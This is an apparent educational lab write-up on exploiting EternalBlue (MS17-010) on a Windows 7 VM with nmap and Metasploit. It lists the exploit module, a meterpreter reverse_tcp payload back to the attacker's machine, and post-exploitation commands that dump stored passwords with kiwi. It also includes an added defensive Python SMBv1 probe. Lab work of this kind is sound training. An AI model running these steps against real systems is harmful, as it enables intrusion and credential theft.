EternalBlue Vulnerability Exploitation
DISCLAIMER!
This content is intended solely for educational and ethical purposes. This activity is conducted with permission. All activities related to cybersecurity must comply with available regulations. The author (me) is not responsible for any misuse or illegal activities performed using the knowledge shared here. Any actions taken by the readers using this info are at the reader’s own risk.
EternalBlue is an exploit initially developed by the NSA (National Security Agency) of the United States, but it was leaked by the Shadow Brokers in April 2017.
EternalBlue targets a vulnerability in Microsoft Windows' implementation of the SMB (Server Message Block) protocol, specifically SMBv1. When hackers exploit this vulnerability to download files from the target, the user of the target computer usually will not notice or detect anything off. Therefore, it is very dangerous.
Today, we will try to exploit this vulnerability to get into a Windows 7 system. For practice purposes, I set up a Windows 7 Ultimate VM to be the target (I will not explain the installation steps here).
Before starting our Windows 7 and Kali Linux VMs, we need to change both of their network settings to use the Host-only Adapter. You can also use a NAT network if you want to. Just make sure that the target VM and Kali Linux have different IP addresses.
TARGET PREPARATION
This step is only for preparing the target that we want to exploit for practice. In a real-case scenario, the target is already there.
First, after we boot the Windows 7 VM, open the command prompt and type systeminfo to see whether this Windows 7 installation is vulnerable to EternalBlue.
After that, check the hotfix list to see whether there is already a hotfix or patch for the EternalBlue vulnerability. If a hotfix name starts with KB401..., then it is already patched. However, if there is none, just as in the picture below, then it is not patched, so we can use this VM as our practice target machine.
We also need to find the IP address of our target machine by using ipconfig in the command prompt.
Next, to make our process easier, we need to disable the Windows 7 firewall. Click the Start button, search for Windows Firewall, and click Windows Firewall.
Go to Turn Windows Firewall on or off.
After that, turn off the firewall for every profile and click OK.
TARGET EXPLOITATION
Now, we can go to Kali Linux and use Metasploit to exploit the EternalBlue vulnerability.
Important: Do not shut down the target Windows 7 VM!
In Kali Linux, we will now simulate the exploitation. We will pretend to only know the target IP. First, we need to scan for the vulnerability and check whether port 445 (SMB) is open on the target machine with nmap -p 445 --script smb-vuln-ms17-010 <target-ip>.
From the scan, we know that the target is vulnerable to EternalBlue. We also get the CVE code, which is CVE-2017-0143. Good enough; now we will proceed to exploit it using Metasploit. Start it with msfconsole.
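As an added example (my own code, not part of the original post), here is a small Python probe that does the first thing the nmap script above does: it sends an SMBv1 Negotiate request to port 445 and reports whether the host still answers in SMBv1, which is the precondition for MS17-010. A defender can run it after patching or disabling SMBv1 to confirm that the exposure is gone; the host/port arguments and the result labels are my own choices.

```python
import socket
import struct

# The only SMBv1 dialect we offer; an SMBv1 server answers with an index into this list.
DIALECTS = ["NT LM 0.12"]


def build_negotiate_request(dialects=DIALECTS):
    """Build a NetBIOS-framed SMB_COM_NEGOTIATE (0x72) request in SMBv1 format."""
    header = (b"\xffSMB" + b"\x72"                     # protocol id, command
              + b"\x00" * 4                            # NT status
              + b"\x18" + struct.pack("<H", 0x2801)    # Flags, Flags2 (unicode, NT status)
              + b"\x00" * 12                           # PIDHigh, SecurityFeatures, Reserved
              + struct.pack("<HHHH", 0, 0xfeff, 0, 0)) # TID, PID, UID, MID
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = header + b"\x00" + struct.pack("<H", len(data)) + data  # WordCount=0, ByteCount
    return b"\x00" + struct.pack(">I", len(body))[1:] + body       # NetBIOS session header


def parse_negotiate_response(resp, dialects=DIALECTS):
    """Classify a raw reply (4-byte NetBIOS header followed by the SMB message)."""
    smb = resp[4:]
    if len(smb) < 32:
        return "no-smb"
    if smb[:4] == b"\xfeSMB":
        return "smb2-only"          # server answered in SMB2 instead of SMBv1
    if smb[:4] != b"\xffSMB" or smb[4] != 0x72:
        return "no-smb"
    if struct.unpack_from("<I", smb, 5)[0] != 0:
        return "smb1-error"         # NT status set: the SMBv1 negotiate was refused
    if smb[32] == 0 or len(smb) < 35:
        return "smb1-rejected"      # WordCount 0: no dialect was chosen
    index = struct.unpack_from("<H", smb, 33)[0]
    if index == 0xFFFF or index >= len(dialects):
        return "smb1-rejected"
    return "smb1:" + dialects[index]


def probe_smb1(host, port=445, timeout=3.0):
    """Return a label describing how `host` responds to an SMBv1 negotiate."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate_request())
            resp = s.recv(1024)
    except OSError:                 # refused, timed out, or reset by the server
        return "closed-or-filtered"
    return parse_negotiate_response(resp) if resp else "smb1-disabled"


if __name__ == "__main__":
    import sys
    print(probe_smb1(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"))
```

A host that reports anything starting with "smb1:" still accepts SMBv1 and should be patched or have SMBv1 disabled; "smb1-disabled" or "smb2-only" is what you want to see after hardening.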
After that, type search cve-2017-0143 to see the exploit and the auxiliary scanner that we can use. We will use exploit/windows/smb/ms17_010_eternalblue later for the exploitation.
Because our target system is Windows x64, we can search for a payload that we can use by typing use payload windows/x64.
For now, we will use windows/x64/meterpreter/reverse_tcp as our payload (it is the default one). Now, we will type use exploit/windows/smb/ms17_010_eternalblue and see what parameters we need to set.
Okay, so from the picture above, we basically only need to set RHOSTS to the target IP and LHOST to the Kali IP, as everything else is already configured. The commands are set RHOSTS <target-ip> and set LHOST <your-kali-ip>.
Then, we will type run and wait for some time. If it is successful, we get a Meterpreter shell.
Now, we are officially in the target system and can execute commands on it. We can use sysinfo to see the OS version, architecture, and so on. We can use getuid to see which user we are running as. (NT AUTHORITY\SYSTEM is actually the highest privilege on Windows!)
Next, we can also load kiwi and type creds_all to get all the passwords stored in the system.
We can also use ls to browse the file system, and we can easily upload and download files from the system. After all is done, you can quit the Meterpreter shell and msfconsole.
CLOSING REMARKS
As you can see, the EternalBlue vulnerability is very dangerous because the target system does not notice anything when the exploitation happens. This hands-on practice is for educational purposes only, so please do not try it on other people's computers without legal permission. Thank you for reading this far and see you in our next post (I guess we will stick with Metasploit for a while haha!)